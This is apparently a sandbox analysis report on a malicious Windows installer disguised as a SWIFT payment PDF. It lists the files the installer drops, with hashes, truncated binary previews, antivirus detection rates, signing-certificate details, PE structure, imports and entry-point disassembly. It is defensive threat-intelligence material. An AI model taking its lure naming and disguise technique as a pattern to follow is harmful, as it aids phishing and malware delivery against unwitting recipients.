                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222640610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Category:dropped
                                    Size (bytes):421592
                                    Entropy (8bit):7.682325489967793
                                    Encrypted:false
                                    SSDEEP:6144:TzZzycMVGAnF3KMrbYTE6ZudWKJJGGCaSninelmgkpmcqaw/cXraHvfMV:5V9QF3ihgxtdel+jw/ar4vm
                                    MD5:1048340BCFAE30DF032C161AC52F8F0E
                                    SHA1:8A3370D01A170626EF43202F5FE54E27372ABEC4
                                    SHA-256:47A75BA2CC69F372C816FB61D079EBE6E3A81EEEB16E72726725B088A59F4E94
                                    SHA-512:446B5293FE99200305CDE7B4EAF17613B6C211AC46CE5EF38D383546C727DE348F6F4733051674CE309A1ED401941985120B0F80F449239D3375F91A2DE2704C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 16%
• Antivirus: Virustotal, Detection: 36%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x......z...x..........i...,"..t.......y...Richx...........................PE..L....e.Q.................\....9......0.......p....@...........................=.............................................s........;..............d..H............................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata.......0:..........................rsrc.........;......v..............@..@................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):11264
                                    Entropy (8bit):5.724200018297216
                                    Encrypted:false
                                    SSDEEP:96:qIsUxO9udx4qYp7AJb76BykUbQMtHUOA5Iv+RnsrqeXV+d1g2IW9t2c+cEwF9Fug:ZVL7ikJb76BQUoUm+RnyXVYO2RvHFug
                                    MD5:6AD39193ED20078AA1B23C33A1E48859
                                    SHA1:95E70E4F47AA1689CC08AFBDAEF3EC323B5342FA
                                    SHA-256:B9631423A50C666FAF2CC6901C5A8D6EB2FECD306FDD2524256B7E2E37B251C2
                                    SHA-512:78C89BB8C86F3B68E5314467ECA4E8E922D143335081FA66B01D756303E1AEC68ED01F4BE7098DBE06A789CA32A0F31102F5BA408BC5AB28E61251611BB4F62B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 1%
                                    Joe Sandbox View:
                                    • Filename: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Detection: malicious
                                    • Filename: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Detection: malicious
                                    • Filename: seDzEfSLFg.exe, Detection: malicious
                                    • Filename: seDzEfSLFg.exe, Detection: malicious
                                    • Filename: Sipari#U015f_#U00d6zellikleri.exe, Detection: malicious
                                    • Filename: Sipari#U015f_#U00d6zellikleri.exe, Detection: malicious
                                    • Filename: Factura_0104109174pdf.exe, Detection: malicious
                                    • Filename: Factura_0104109174pdf.exe, Detection: malicious
                                    • Filename: Transferencia.exe, Detection: malicious
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....e.Q...........!.................&.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..H....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):6656
                                    Entropy (8bit):5.028420190047439
                                    Encrypted:false
                                    SSDEEP:96:Q7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgNF38:aygp3FcHi0xhYMR8dMqJVgN
                                    MD5:052A077EE8B519AADBCF29E6B5E710A4
                                    SHA1:B3AB29D0EBDBDCA63E4DFFD2FD2E6B9188FFAE4B
                                    SHA-256:9A1A5C6F598247BFA52624CD793B9EF4FB85863CC9DFD69EB7EF671CACC906C9
                                    SHA-512:CB11CBA331B85122DCC2D57171CE20382AF0A9FDF0A85A30155404D975901A313C9285EB9445E51979C6EC8416CCDF97FDEAF1BD2203C9395AD046A385A90009
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 1%
                                    Joe Sandbox View:
                                    • Filename: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Detection: malicious
                                    • Filename: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Detection: malicious
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....e.Q...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text...J........................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):217824
                                    Entropy (8bit):1.0399386438008156
                                    Encrypted:false
                                    SSDEEP:768:TxtDvwwKe7lLjmPR6s64AFEdo7QFOIZ8v6oS/88AGuh7Wz+dUa826EL6tqZscZGg:XgCj6kzuIT
                                    MD5:0CDAC4CECC5709A94D54CCAED51945E0
                                    SHA1:DA022C65989787E3C16C0FD4754FEB55E2851D60
                                    SHA-256:A6EBB5155B1EB41CF2485F84E7FD89ECC3FEB27B0EAD2F11107495E662BC776F
                                    SHA-512:4D54F9D2CAFA7E6D88BA394D17B4748D37ADAB57D0F18AC2D9162F4789D3EF3599CCE94570195525699819ACFBD8A56E44B15B2735382737675ABA34BF663642
                                    Malicious:false
                                    Preview:..4..................a........................................................................................p................................r......................................................................................A..........@.^.....b............................................".X........................=..............i.......................................................................................................(......................................................$..............................q...................................................................../.........#...........a............................................................;..............W.........................................................B...............:............................q.......$...............................A.......................................a.........................................J............................<...................................................
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):153900
                                    Entropy (8bit):7.748880956807625
                                    Encrypted:false
                                    SSDEEP:3072:NoIf/wL0q3LqwKd9z1hu9dDlaCYKo54xLPEAdJFxQjlH6UjpO3:NTf4YbDzj0VzYZ54VHQdVI
                                    MD5:AF0A71A847EAFD2BC3C2CEE3D0F81BEA
                                    SHA1:B3778CCE5E994E2DEDE039B30D44E85F945B4275
                                    SHA-256:2BDF5166D0B62258965F6B308CF42150D8D129DE55E59C6851D744E7242A0D7D
                                    SHA-512:27BCB4EA5AA12A4EE82633332AFAA41627975D301F85AB6B4D13B0CAEE9FCBCA310D863EC969E69782F03D1F13AF13A8DBA4B12A592E19FCA3AB71EAC63436D0
                                    Malicious:false
                                    Preview:.......w......L.(((.>....;..ii...==.%.....77777..........................E......NNN..444.t..................FFF.....6.......~.....p.......ff.''...... ...u........Z....ddd.......vv.......ssssss.EEE.....,...........UU.oooo.............:.........|.........H.........................00.y.........x.&.....................+..............ppp..........0.@@...............<....A...............pp.11.***.L.JJ.........H.............X......II..Z...........ss.n.....\\.................====................<<.........::.......S.....@.....::::......................:...:............................................S...........................??..........&.;..............;;;...........'''''.........E.f...f!...W..........t.!....4.q........7f...............f...!..."(?f.......Z.....X......k..f...........j>1.!......:.....'.....f........f=.l.....+.0..........|...f........}.@...!. ....1.<.f....................f...........|........f.....0.r.....bh..f...C.....-;.&f......|.G...f.....*,......6.B....
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                    Category:dropped
                                    Size (bytes):284271
                                    Entropy (8bit):1.0251357322266477
                                    Encrypted:false
                                    SSDEEP:768:3ikksaRhO0tDtDHT4agsOypRJ5UVofBnhIOPNs28Bu7LYDRa5dv8Kn8GBrhGmVxr:FiRk48kL78Ka
                                    MD5:FCF65B7D81E9B8F78EC8C24CA3092A8A
                                    SHA1:700291ADFE86A3022D39E46E71D9E44E158C6F6D
                                    SHA-256:A91235C263F3C28790B391F6EAD3ED10F674FBF7FC5E10A3640F9937902273E8
                                    SHA-512:C1F136D6C9CAD6A9195DA2690A8FCF2640A364DC6D636B2B8218C7022A59D2E99305ECDD201B614A92CE7EC4A955FC7C3389B7862BD25CACC531DFDE3B2DAEF3
                                    Malicious:false
                                    Preview:...........................1...............................................&......................................~...................i.........................v.....................................................................................................................................D........y................m......................................................]..........F..J..........................................:.....#.......p. .........k................................................{..............Q..........=.....................................................................@............s....l..........u........................................................................[..........................................................................................................................\..............<........................................i...........................g.....................................................I................R.X.0............
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):494
                                    Entropy (8bit):4.230726516650528
                                    Encrypted:false
                                    SSDEEP:12:pKG5STxNjA4TkEIQT5i6Dk3Qm0oyyGq2qAOaUwbeKWjNB/JJsn:pP5STx5jTkqT5iMJiRaUWedBBBJsn
                                    MD5:19B947E1171EC056B5989798225E3080
                                    SHA1:C8703F1F4AE3A1A81924FAF13F7305CBA4AEF6CA
                                    SHA-256:D7F13F88A63E6A8EDB1DD1A5C194004A3FC24C870D2AC6013FAF13AFC6E77577
                                    SHA-512:E0E4878AF414BD2845ED7A63AEA844DAD77BDAD375D2BD6A2A69DE9A8730571059BCA5C7F937C2BD5205D13D92CFE8B22684214EB0BA673C9446F10DEBF24D25
                                    Malicious:false
                                    Preview:dentical baldrende kekchi colectomies cupressus roofers..overregulates reaccumulation travestiernes ecdyson mezentius garnngle spasticitets brnehavelrerindernes liplike electrodiplomatic..heteropelmous traadls statsoverhoveder eftersprgselspressenes.skrsliberne aspired twaddles mangle gentoo porphyrogenitus quislingers.underteamed bonitet prostigmin kontorsystemers fresser shutterbugs forlngerledningen velokalernes moguey..nonsympathetically lutetian friarealer sciatically hosea stymperes,
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):11919
                                    Entropy (8bit):4.662231882647804
                                    Encrypted:false
                                    SSDEEP:192:Lk13ArLrSFODVN/Rw8+twz9KC++zakPjz4dev5tMTo:L8wTXV+twxKC1P3sAtCo
                                    MD5:C904D46896C283F2B7BA50B5553450F2
                                    SHA1:92E34620A0C1449364A53043E849271F209F901A
                                    SHA-256:A2A01736F72E3601A76D3CB12BA8E0EE20F9A346AF3FC7184098AFF7B5B36533
                                    SHA-512:D51DEBA89B8035C819DEDC7DEDF720551F4CAD2CEF06F9C4CE31857B4EFF1EFDC53644CD38593A8AE18AA41E0090D3931AC95DF89263D2B10D0D1BB76A03AA66
                                    Malicious:false
                                    Preview:..&&.j...............y........................"...............................................................................................................................................................................................................................................................................HH...................t..p.''...``....,.".]...r...........0.l....................................oooo....V......._.......................UU...MM...........................TT...............p.n..........rr..............`.........................................1....................d.....s.........e.....9...............................QQQ.Q....))..................d.^......d..............i...............666666.nn.............G.........~~~~.........XX...666..............@@@......................AAA.....XXX.........................H....@@.......................l.......d.D.....e........KKK.......J...>.BB....@..nnnnnnnnnnnn.......00.....
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):281794
                                    Entropy (8bit):1.031572732289543
                                    Encrypted:false
                                    SSDEEP:768:oslLjhedzTOljJJZU1Buju3jmpZOzcqM4uYLjqTSL6C7obTtV3tkQuHtJ2vj+CXu:oOJJZDj7341Vonj5aCZ
                                    MD5:E828786A178F23B7F56B9990A65CEEA5
                                    SHA1:0FFE78218DF805DA550BE16EE19E9946F39363B5
                                    SHA-256:9BAAB1CDE953046954210F305136997005939F5EB8529DD51B2459034D0FBDFD
                                    SHA-512:C4E5CBC49D03AA2C5E5EB2A2C9AD21CD9A375A98E686B5C3729C0B2B00A7CE5D7705E56F221F9B49538A433CCDA12F1DD65CE97C0D4DB9B1F9F8C8AC18A49CCC
                                    Malicious:false
                                    Preview:........................................z.....1...............................................................................I..................................................................................f..................................................................................[...b..................................................................................................I.....H...R.K........M........................2....D......................................................./....................B...................................../...h..................................................u........?...........................S...............4..........M........._........................R..............................n......................................................................................................................Z........................................................................................................h............................
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):188525
                                    Entropy (8bit):1.0329334808429573
                                    Encrypted:false
                                    SSDEEP:768:5WINhheDhXPeDwAT/fXFKxz/nHTslCNCS6HKLs+SfWpHk6:LnFMplE6
                                    MD5:04A03D1660020BED3AB9984BFAA2EF04
                                    SHA1:21CB45D775B5DC16CABA3B80C3B458B3DBBCFB34
                                    SHA-256:A0D4F715188B1044C5F9876491F8CECE5728D166DA60B9514DD244ECF42F29F6
                                    SHA-512:352260C7501E0751FB93845B7BDDECA1BCC29DCFB745CCAA0A106556C2CA5787B0C64BCCAFDCC3FF2FF1AE0E428E03F8F6660AEFBF03EBF99A5C0D7769C3BEB9
                                    Malicious:false
                                    Preview:.................................................O.................................................+........................................G..................b.................z.......y........................................................................................................P.........!...........................................................C..................................$.................................................................k.................x........1........................................................D.......................p................................................+................................f.....................C.....-............................~......................................................Z........b....................................................................................2............................................................................(.........G...........................................#...........
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):78505
                                    Entropy (8bit):1.024537818999984
                                    Encrypted:false
                                    SSDEEP:384:OAC2dKLt1Lsw1d6OnQhcT+7ItGC3VVnxwZHr4WpJuHqLrJzE:5IYw1d6OnfT+8zWpJuIJz
                                    MD5:F18075570354F7C71286D7E633605CE6
                                    SHA1:1CE1B223EAE5AE1BF61B72A4032953271A07C3CC
                                    SHA-256:50B67542F8655D7110CD14285A6E8BFD3F238B3AF26985D7F57C48F78A0BB646
                                    SHA-512:FE91EA361444335D3B67691CBA1776A94D5BDBA16359D507F1B6042A02F6F4C4A2B9FF8E45609759EAA51F94F17D47E28DA7995BB123E9B742900DACE917F018
                                    Malicious:false
                                    Preview:.......................x.................. .......................................Q.......~.......................:..........................................................+.............W......l....................?[...........................W...........V.o..*...............)..........N.......................................A..........................................................!........^....................-...+..............................`........................h......................................f...........\....a.....................................C.............y................................................................................S.......................................................................................................y.........................................c............B...............................G..................................<...............K=..........................................................................................
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):30
                                    Entropy (8bit):4.01506101220307
                                    Encrypted:false
                                    SSDEEP:3:+f4tfEOGOWbP:U4tf9GOWbP
                                    MD5:9A87E14E4F6590E4B39073FCF55944A4
                                    SHA1:4AF8D2E9EE06321E83497982ED8E55AF244A8B07
                                    SHA-256:D6E32A651EBDD996FB69025D557FECFCD8547729091BF76327B0A118A6D333FC
                                    SHA-512:128B8180EFD08F7A86635694A4B7CE634A24636E851D4A293F9B677AA4BC9A5F6D0EDD61896F4D7FB74F55E99B929822A6FF5AF0FE6428BE9EE4D14AFEB37B34
                                    Malicious:false
                                    Preview:[menthane]..raffaele=voksvrk..
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):2359296
                                    Entropy (8bit):4.362643507184067
                                    Encrypted:false
                                    SSDEEP:49152:AnvorTo81uJOaX1OADJEEagmcnYJ1u8vs:r
                                    MD5:DA4FBC3BC298FB60CB7219E669C0194B
                                    SHA1:A0B8BF1442AB017D1FC0B808A74A964F3BB4040F
                                    SHA-256:F21F704D2E9D54087CF203BA89822A5F10EEE982DC75A44B80A7ACDACF6FF9B8
                                    SHA-512:810D4454C4A8EA95D4613190C2803508F20CB9AE3E485470DC22DCD46C07E2B726AAEBF8EC8B38E421D17BEA4357457F82F0991ABA226646E39FCDF8A575460D
                                    Malicious:false
                                    Preview:regfF...F...5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm.(.................................................................................................................................................................................................................................................................................................................................................C*.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):3.240162043914715
                                    Encrypted:false
                                    SSDEEP:768:8mQyPan9aUCUWaOy/OTIi86uXYCImggUJqR5/eF34JoeyG2SKiDEU/wIZLs5agYs:3ERuLLuX0mRNRD/7G4gYfe+M
                                    MD5:3B3172247B5079ED7E1023D92D6EBAD7
                                    SHA1:79DA5B5B1936E6F82BD10C4572C68A681D32A82D
                                    SHA-256:BF09C6B1BBF6B8B4649CDC11451F844E613296E5C8AAD0BD1981BD52EBD0D000
                                    SHA-512:F0BC981CA0AA52A6FA27A6EC1284099AEEAE7DCE823EA5C59E53383E12329414946870B31D7AC297F24640B161DEEDD14D4406CEF694D1B8123BCC4F113DBF3E
                                    Malicious:false
                                    Preview:regfE...E...5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm.(.................................................................................................................................................................................................................................................................................................................................................C*.HvLE........E.....!.....3....b.^p.so-..}.........P...............................`.......................................................P!.......!.....hbin................5.#.^...........nk,....S...............................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk ..$8^........(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):7.682325489967793
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:SWIFTCOPYMT1030000000_pdf.exe
                                    File size:421'592 bytes
                                    MD5:1048340bcfae30df032c161ac52f8f0e
                                    SHA1:8a3370d01a170626ef43202f5fe54e27372abec4
                                    SHA256:47a75ba2cc69f372c816fb61d079ebe6e3a81eeeb16e72726725b088a59f4e94
                                    SHA512:446b5293fe99200305cde7b4eaf17613b6c211ac46ce5ef38d383546c727de348f6f4733051674ce309a1ed401941985120b0f80f449239d3375f91a2de2704c
                                    SSDEEP:6144:TzZzycMVGAnF3KMrbYTE6ZudWKJJGGCaSninelmgkpmcqaw/cXraHvfMV:5V9QF3ihgxtdel+jw/ar4vm
                                    TLSH:9A94CF56E349ACA4ED1B07B5663BED724E13BEB8D460544D25DE3E2F3A73382402AD43
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L....e.Q.................\....9....
                                    Icon Hash:d080c6ee8e92ca1d
                                    Entrypoint:0x4030ef
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x519965C7 [Sun May 19 23:52:39 2013 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:b40f29cd171eb54c01b1dd2683c9c26b
                                    Signature Valid:false
                                    Signature Issuer:E=Semicomplicated@Vrdipapirets.Ib, O=Barnestemmen, OU="Trommer Taljerings Beseglet ", CN=Barnestemmen, L=Malpas, S=England, C=GB
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                    Not Before:19/03/2024 04:25:51
                                    Not After:19/03/2027 04:25:51
                                    Subject Chain
                                    • E=Semicomplicated@Vrdipapirets.Ib, O=Barnestemmen, OU="Trommer Taljerings Beseglet ", CN=Barnestemmen, L=Malpas, S=England, C=GB
                                    Version:3
                                    Thumbprint MD5:72A0C51184EA239E3D8B07F2533C830A
                                    Thumbprint SHA-1:B5D55F0EBABB32F51FFE7CFAE772684E37784D2B
                                    Thumbprint SHA-256:F733F533CB918821C2FB04E9426DEECB50A81E7F2FDB4DE85740159CAFCC5D15
                                    Serial:299C36F294A51C29CB99380D7E7AF51734A58CC7
                                    Instruction
                                    sub esp, 00000184h
                                    push ebx
                                    push ebp
                                    push esi
                                    xor ebx, ebx
                                    push edi
                                    mov dword ptr [esp+1Ch], ebx
                                    mov dword ptr [esp+10h], 00409190h
                                    mov dword ptr [esp+18h], ebx
                                    mov byte ptr [esp+14h], 00000020h
                                    call dword ptr [00407034h]
                                    push 00008001h
                                    call dword ptr [004070B0h]
                                    push ebx
                                    call dword ptr [0040728Ch]
                                    push 00000008h
                                    mov dword ptr [007A27B8h], eax
                                    call 00007F276C530BE3h
                                    mov dword ptr [007A2704h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+38h]
                                    push 00000160h
                                    push eax
                                    push ebx
                                    push 0079DCB8h
                                    call dword ptr [00407164h]
                                    push 00409180h
                                    push 007A1F00h
                                    call 00007F276C53088Dh
                                    call dword ptr [0040711Ch]
                                    mov ebp, 007A8000h
                                    push eax
                                    push ebp
                                    call 00007F276C53087Bh
                                    push ebx
                                    call dword ptr [00407114h]
                                    cmp byte ptr [007A8000h], 00000022h
                                    mov dword ptr [007A2700h], eax
                                    mov eax, ebp
                                    jne 00007F276C52DE7Ch
                                    mov byte ptr [esp+14h], 00000022h
                                    mov eax, 007A8001h
                                    push dword ptr [esp+14h]
                                    push eax
                                    call 00007F276C530328h
                                    push eax
                                    call dword ptr [00407220h]
                                    mov dword ptr [esp+20h], eax
                                    jmp 00007F276C52DF30h
                                    cmp cl, 00000020h
                                    jne 00007F276C52DE78h
                                    inc eax
                                    cmp byte ptr [eax], 00000020h
                                    je 00007F276C52DE6Ch
                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3bf000 | 0x111c8 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x66490 | 0xa48 | .data
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x5bc2 | 0x5c00 | d75213ff3654bd251ba7ede13ba551f3 | False | 0.6815132472826086 | data | 6.5073852787100455 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x7000 | 0x11ce | 0x1200 | 6c31e0693072284f258d2c4a271de506 | False | 0.4524739583333333 | OpenPGP Secret Key | 5.236327486414569 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x9000 | 0x3997f8 | 0x400 | cc4b8c7cfe81dc194cfb0c595288fc86 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata | 0x3a3000 | 0x1c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0x3bf000 | 0x111c8 | 0x11200 | bbb015d8423c571296eed99a1464fd36 | False | 0.12783702098540145 | data | 4.40852816567891 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0x3bf208 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m | English | United States | 0.11396841358097717
                                    RT_DIALOG | 0x3cfa30 | 0x120 | data | English | United States | 0.5138888888888888
                                    RT_DIALOG | 0x3cfb50 | 0x11c | data | English | United States | 0.6091549295774648
                                    RT_DIALOG | 0x3cfc70 | 0xc4 | data | English | United States | 0.5918367346938775
                                    RT_DIALOG | 0x3cfd38 | 0x60 | data | English | United States | 0.7291666666666666
                                    RT_GROUP_ICON | 0x3cfd98 | 0x14 | data | English | United States | 1.15
                                    RT_VERSION | 0x3cfdb0 | 0x148 | x86 executable not stripped | English | United States | 0.600609756097561
                                    RT_MANIFEST | 0x3cfef8 | 0x2cb | XML 1.0 document, ASCII text, with very long lines (715), with no line terminators | English | United States | 0.5664335664335665
                                    DLL | Import
                                    KERNEL32.dll | Sleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
                                    USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
